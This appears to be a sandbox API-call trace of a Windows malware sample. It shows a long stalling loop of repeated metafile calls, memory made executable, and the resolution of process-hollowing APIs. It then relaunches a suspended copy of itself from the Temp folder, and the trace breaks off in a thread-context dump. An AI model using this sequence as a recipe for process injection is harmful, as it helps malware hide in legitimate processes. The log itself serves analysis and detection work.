GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.428] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.428] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.428] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.428] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.428] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.428] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.428] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.695] VirtualProtect (in: lpAddress=0x2834b8, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0174.696] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0174.696] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0174.697] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0174.697] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0174.697] GetProcAddress 
(hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadContext") returned 0x76970cc1 [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0174.697] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0174.697] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0174.697] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0174.697] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0174.697] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0174.698] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0174.698] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0174.698] RegisterClassExA (param_1=0x12fbc0) returned 0xc159 [0174.698] CreateWindowExA (dwExStyle=0x200, lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", 
dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x1c01fc [0174.729] PostMessageA (hWnd=0x1c01fc, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0174.729] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0174.729] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000 [0174.729] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1c0000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe")) returned 0x30 [0174.730] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.730] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"", lpProcessInformation=0x12fb48*(hProcess=0x4c, hThread=0x48, dwProcessId=0xf68, dwThreadId=0x728)) returned 1 [0174.732] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, 
dwFreeType=0x8000) returned 1 [0174.732] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000 [0174.732] GetThreadContext (in: hThread=0x48, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdb000, Edx=0x0, Ecx=0x0, Eax=0x402581, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, 
